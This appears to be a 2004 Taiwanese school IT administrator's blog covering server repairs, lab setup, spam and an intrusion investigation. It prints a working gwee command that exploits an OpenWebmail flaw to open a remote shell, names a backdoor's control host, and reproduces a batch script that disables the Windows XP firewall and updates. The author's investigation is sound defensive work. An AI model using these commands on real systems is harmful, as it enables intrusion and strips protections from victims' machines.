2004年10月31日 星期日

BBS 的魔咒

BBS 現在已經是整台全新的機器,跟電腦教室用的一樣。

硬碟也換掉了,SCSI 卡也換掉了。最不可能壞掉的 SCSI 排線也換掉了。沒有一樣是舊的。

但還是抓不到硬碟。很傷腦筋,修電腦最怕的就是同時壞兩樣東西。全換新的之後還是有東西是壞的,那就很難檢查。

所以 BBS 復站又要再等了。

2004年10月28日 星期四

有人報名參加 BBS 維護

高一心 陳明軒 nice_cookie_2000.AT.yahoo.com.tw
高一齊 李長益 q35120.AT.yahoo.com.tw

這兩位同學,還有一位高二同學,我忘了留下姓名。大家很熱心想要參與 BBS 的維護。
不過目前比較麻煩的是,訓練的時間很長,等訓練完,應該也早就修好了吧。

所以可能要在 BBS 修復之後,才開始訓練。重點是 FreeBSD 系統的管理。

2004年10月27日 星期三

新電腦教室 A 正式啟用

從今天開始,電腦教室 A 正式啟用。

可惜第一班初二某班上完之後,清出一大堆垃圾,還有人把食物醬料灑在地板上,真令人嘆息,不知道那麼多人忙那麼久是為了什麼...

2004年10月25日 星期一

莫非定律

這真的是莫非定律。

總是殷殷勸諫他人應時常備份自己的資料,我自己卻沒有這樣做,於是今天我的硬碟死掉之後,我進正心這幾年來所有的文件及數位照片全數消失。辦公用的電腦也暫時沒辦法運作了。

既然自己的電腦不能用了,只好多花一點功夫來弄 BBS,BBS 似乎被下了惡咒,整個安裝過程中一直非常不順利,老是狀況百出。比如說,我拿了一片新的空白光碟,燒了 FreeBSD 4.10 Release 的安裝片,安裝到後來老是在某個地方失敗,看起來是硬碟 slice 分割有點問題,所以在做完 newfs 這個動作,開始把東西放進硬碟中時,就出現各種錯誤訊息。

後來才發現是安裝光碟片有問題。從七月多維修 BBS 到現在,沒有一個零件是完美無缺的運轉,不是那裡出問題就是這裡出問題。這次新電腦終於來了,從頭到腳沒有一樣不是新的,就連放著舊資料的也是之前剛換過的新硬碟。但還是裝不起來,有一兩個同學看到學校首頁我的徵求站長公告,來找我看能不能幫忙,但很可惜我知道他們幫不上忙,只好又打發他們走了,但還是非常謝謝你們!

目前系統暫時是起來了,但存放 BBS 舊資料的 SCSI 硬碟卻抓不到(應該說曾經抓到過,然後就消失了)。現在又暫時沒輒了,我最近運氣真的不太好,還是少摸點電腦好了。

2004年10月24日 星期日

WordPress 防廣告留言

今天晚上我一上這裡,就發現這個地方被塞了快一百篇的廣告留言(comment spam)。

這種廣告商很討厭,它會利用搜尋引擎自動找出安裝 WordPress 的網站,然後用機器人程式自動在網站上留言,目的是為了提高他們網站的曝光率(比如說 Google 上的排名往前移)。

反制的方法也有不少人在討論,比如說這個 Word Press Blacklist Comment Spam Plugin,或是 How to combat comment spam with WordPress

但我覺得這些方法都很麻煩,反正機器人看不懂人類的圖片,就讓留言者每次留言時,都要輸入經過「人類測試」,要看一張圖片,確定圖片中的字母,依序輸入。

其實這個方法我早在本校網站首頁上就已經在使用了,比如說這個管理者登入網址

我在這裡找到了有相同想法的人寫的程式:WordPress Hack: AuthImage,我已經把這個程式用在這個網站了,所以各位如果要留言的話,必須輸入圖片中的字母喔~

其實這個程式寫得不夠好,因為他要改不少東西,如果可以做成 plug-in,隨插即用就更好了。

產生短網址

剛剛幫本站弄了一個簡短網址:http://0rz.net/ba00f

這其實只是轉址的功能,很簡單。
你可以在這個網站:http://0rz.net,輸入一個長的網址,它就會丟一個短的網址給你。

這有什麼好處呢? 當你轉貼這些連結的時候,可以不會超出一頁的範圍,比如說在 bbs 裡面就特別好用。不用叫使用者還得自動把被斷行的網址接起來。

除了上述提供的網站,國外還有另一個提供相同功能的網站:http://tinyurl.com/

更有趣的是,竟然也有人提供把網址變長的服務:http://www.hugeurl.com/

2004年10月21日 星期四

駭客入侵事件簿1

目前大概已經整理出駭客入侵的路線了。

我一開始是看到 www 這個使用者,一直有在執行 crontab,它會不斷的去呼叫 /var/spool/uucppublic/sh。
這顯然是一個後門程式,所謂的後門就是駭客入侵之後,為了避免當時用來入侵的漏洞被修補起來,所以打開的一道後門,供日後方便進出該機器。

[[MORE]]
我使用 lsof 去觀察這個檔案,及其開啟的檔案或者網路 port,發現它會連到這個地方:
ccadam.com:6665

因為最近很忙,所以一直沒有去注意最近被發表的漏洞,只知道駭客是利用網頁的服務進來的,可是本校的網頁實在太多,到底哪一隻程式出問題,其實也不曉得。只好先隨便猜測,然後找看看有沒有對應的 advisory。還好,沒有花太多時間就鎖定了一隻有漏洞的程式:openwebmail,也就是我們的網路郵局。

根據 Hackwire上的資料,有一個不錯的 exploit 工具:Gwee,可以幫助我去驗證這個漏洞。

gwee (Generic Web Exploitation Engine) is a small program written in C designed to exploit input validation vulnerabilities in web scripts, such as Perl CGIs, PHP, etc. gwee is much like an exploit, except more general-purpose.

要入侵具有漏洞的 openwebmail 系統,只需要下這個指令:

gwee -L -y'loginname=%3B' -llocalhost -p31337 http://target/cgi-bin/openwebmail/userstat.pl


該程式會在 localhost 去 listen 31337 這個 port,然後傳回一個受害端的 shell,這個 shell 是以 www 的身份在執行的。

由於學生郵局有較嚴格的防火牆設定,所以這個工具沒辦法生效。(雖然還是有機會繞過防火牆來執行 exploit)但首頁用的主機我為了提供更高的效能,所以沒有架防火牆,因此成為目標。

現在已經將 openwebmail 都更新到最新版了。有漏洞的版本包括 OpenWebmail 2.20+ (2.20, 2.21, 2.30 confirmed) 。

駭客如果要找受害者,真的容易到了極點,不講太明了。

041021 工作紀要


  • 新電腦教室已經開始安裝了。協助測試其中的大漢天威卡,及其還原功能。

  • 跳舞時代 電影放映師。

  • 尋找駭客入侵的蛛絲馬跡,及其可能的入口。

2004年10月20日 星期三

代理伺服器不穩中

proxy 有問題,不過不是我們的有問題,而是縣網中心的 proxy 有問題。但由於他是我們的上游,所以我們校內上網,只要有設定 proxy 的都會受到影響。

其他工作摘要:

  • 全縣國中小英語話劇比賽協助攝影

  • 段考平時成績整理。

木馬繞過 Windows XP SP2 防火牆的方法

其實內建防火牆可以簡單的用 net stop 來加以 Disable。

進而修改以下的機碼(增加例外):

Application Exceptions:
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParameters
FirewallPolicyStandardProfileAuthorizedApplicationsList

Port Exceptions:
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParameters
FirewallPolicyStandardProfileGloballyOpenPortsList

[[MORE]]
這裡附上一個批次檔(來自 GovernmentSecurity.org討論區):
KillFirewall.bat


@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
DEL "%Temp%.kill.reg"
DEL %0

2004年10月19日 星期二

Google Desktop Search

Google 實在是一個充滿活力與創意的公司,屢屢發表新作品,總能讓人眼睛一亮。

比如說本月 14 日剛推出了一個叫 Google Desktop Search 的工具,他可以讓你搜尋個人電腦中的 Outlook / Outlook Express 信件、Word 文件、AOL Instant Messenger 聊天記錄、 Excel 資料、Internet Explorer 曾經瀏覽過的網頁及歷史紀錄、PowerPoint 投影片、及各式純文字資料。而且就像你在網路上用 Google 一樣的方便與迅速。

當然也有高手提供了 Google Desktop Search 繁體中文版,對英文有恐懼的人可以抓回去試試看。(驗證碼:MD5: 2d4b745204680abc0d6c16c2da019d3d)

目前這套工具已經成為我工作用電腦必裝的東西,因為我自己的文件實在很多,常常要找半天。裝了這個軟體,它會在電腦閒置的時候,對電腦中的文件作索引,所以感覺搜尋速度非常快,當然比 Windows 系統內建的搜尋工具要快上幾百倍。

中文網路上也有一些人已經發表了不少對這個軟體的評論,大家可以參考看看。

041019工作紀要


  • 一年一度的健康檢查

  • 國文科教學演示 協助攝影

  • 國文科教學演示 協助單槍播放

  • TODO: 單槍經借用後,遺失延長線一條,正追查中。

  • 段考成績計算與登錄。

  • 照片掃瞄及新聞上網。

  • 週四跳舞時代電影放映及座談會的新聞稿整理,已經發給中央社,週四可以在各大報刊看到。

  • 有不速之客侵入我們的網站,正在追查中。

2004年10月15日 星期五

好猛的廣告信

剛剛要關機前突然看到一個郵件系統的記錄:

Oct 15 21:07:08 power postfix/smtpd[60640]: ADF4E2EE53: reject: RCPT from arc-relay1.arc.nasa.gov[128.102.31.194]: 450 : User unknown in local recipient table; from=<> to= proto=ESMTP helo=
Oct 15 21:07:10 power postfix/smtpd[60640]: disconnect from arc-relay1.arc.nasa.gov[128.102.31.194]

好厲害,從美國太空總署 NASA 寄出來的廣告信/病毒信耶...
不過當場被我們的伺服器擋下來了,很不給面子啊!

041015 工作紀要


  • 整理大量新聞資料,並將之上網

  • 繼續處理「跳舞時代」的宣傳事宜。

  • 電腦閱卷讀卡機教學

  • 決定今年大學榜單上網,並處理格式的問題。

  • 監考

  • 資訊科能力競試培訓開始。目前只有劉俊麟一個人參賽,如果還有人願意報名,請盡快聯絡我。

  • 運動會秩序冊封面設計

2004年10月12日 星期二

電腦閱卷讀卡機故障已修復

教師電腦室之電腦閱卷讀卡機故障,經聯絡廠商之後,推論可能是微動裝置故障,他們將請技術人員南下維修。

但今天早上突然又可以用了,所以暫時可以省下一筆維修費用。更重要的是,段考暫時不會受到影響。

跳舞時代海報公布

跳舞時代是金馬獎最佳紀錄片,在 93 年 10 月 21 日晚間 7:00 ~ 10:00 將於校內正心堂放映,屆時該片兩位導演都會到場參與座談,請大家告訴大家。

海報已經張貼於聖心樓及初中導師室前布告欄。

Cisco access-list 更改

本校對外的 access-list 做了個重要的修改,就是除掉 access-list 的簡易防火牆。(使用 clear access-list 135)

清除的內容如下:

access-list 135 permit ip any 163.27.230.0 0.0.0.255
access-list 135 permit ip 163.27.230.0 0.0.0.255 any
access-list 135 permit ip any 163.27.240.0 0.0.0.63
access-list 135 permit ip 163.27.240.0 0.0.0.63 any
access-list 135 deny icmp any any
access-list 135 deny udp any any eq tftp
access-list 135 deny udp any any range snmp snmptrap
access-list 135 deny tcp any any range 135 139
access-list 135 deny udp any any range 135 netbios-ss
access-list 135 deny udp any any eq 445
access-list 135 deny tcp any any eq 445
access-list 135 permit ip any any

這個部分主要是用來檔微軟的病毒用的(例如疾風病毒),但這類病毒現在比較少了,所以將限制拿掉。以後若有類似的病毒出現,將改以防火牆搭配個人用防火牆互相搭配使用來防堵。

2004年10月9日 星期六

BBS 又掛了

BBS 真是多災多難,現在又掛了。
看起來是 IDE 硬碟的問題,每次都壞不同的地方,年紀太大了嗎?

2004年10月8日 星期五

FirefoxIE

FirefoxIE 是一個教你把 Firefox 的外觀改得跟 IE 一模一樣的網站。呃... 好像沒什麼用,不過也許可以利用這種方式推廣 Firefox。

2004年10月6日 星期三

新電腦教室 A

電腦教室 A 將於本月中開始更新軟硬體,舊的電腦設備將移往對面的語言教室,將來作為語言教材之用。

電腦教室 A 保留舊有的桌子,拆除底下的鍵盤架(因多數已經毀損),屆時該教室將使用 17 吋液晶螢幕,所以鍵盤直接放在桌面上仍有足夠的空間。網路線材與交換式集線器亦同時更換,以避免老舊線路拖慢網路速度。

原 14 吋 CRT 螢幕部分移往電腦教室 B 作為更替之用(有不少螢幕已經因為老舊出現色彩不平衡的狀況),其餘亦移入語言教室中。

新作業系統採用隨機的 Windows XP pro,上面安裝的軟體多為自由軟體或部分全校授權軟體。廣播系統也更新,至於還原卡則採用大漢天威卡 3.0 版,可於主控端遠端遙控開機、關機、還原。未來新教室將可提供更方便的管理。

2004年10月5日 星期二

.Net 網站

提供幾個不錯的 .Net 網站資源:

程式修正 - 呼叫其他程式

上次提到的 C# 呼叫其他應用程式的方式一直會出現問題,會出現這樣的錯誤:

An unhandled exception of type 'System.ComponentModel.Win32Exception'

[[MORE]]
我改用這樣的方法來寫就解決了,這個例子是連線網路磁碟機的作法(請注意其中的斜線):


using System;
using System.Diagnostics;

namespace DefaultNamespace
{
class MainClass
{
public static void Main(string[] args)
{
ProcessStartInfo pc=new ProcessStartInfo();

pc.FileName = "net";
pc.Arguments = "use m: \some_pc\share";
System.Diagnostics.Process.Start(pc);
}
}
}

2004年10月4日 星期一

Mozilla Firefox 1.0PR 更新

Mozilla Firefox 1.0PR (搶鮮版)被發現一個安全漏洞。
「惡意的網頁可能誘導使用者試圖儲存檔案但實際上卻刪除了下載目錄中的檔案」,請使用者務必更新。

所有更新資訊可以在中文版網站找到。
另外,Firefox 0.10.1 也已經推出了。

2004年10月1日 星期五

DOS Box

DOSBox
DOSBox emulates an Intel x86 PC, complete with sound, graphics, mouse, (modem)?, etc., necessary for running many old DOS games that simply cannot be run on modern PCs and operating systems, such as Microsoft Windows 2000, Windows XP, Linux and FreeBSD. However, it is not restricted to running only games. In theory, any DOS application should run in DOSBox, but the emphasis has been on getting DOS games to run smoothly, which means that communication, networking and printer support are still in early developement.

FreeDOS
The goal of the FreeDOS Project is to create a free implementation of MS-DOS. DOS is a popular system, and there is plenty of hardware out there that supports DOS. The FreeDOS Project was founded in 1994 by Jim Hall.

Packet Sniffer with C#

提供兩個連結:

041001 工作紀要


  • 中區親職教育研討會協助投影

  • 新電腦教室其中一部電腦已經來了,我將依據之前的規劃來安裝這台電腦,如果有任何可以建議的地方請在這裡反映,或是直接到前述網址補充。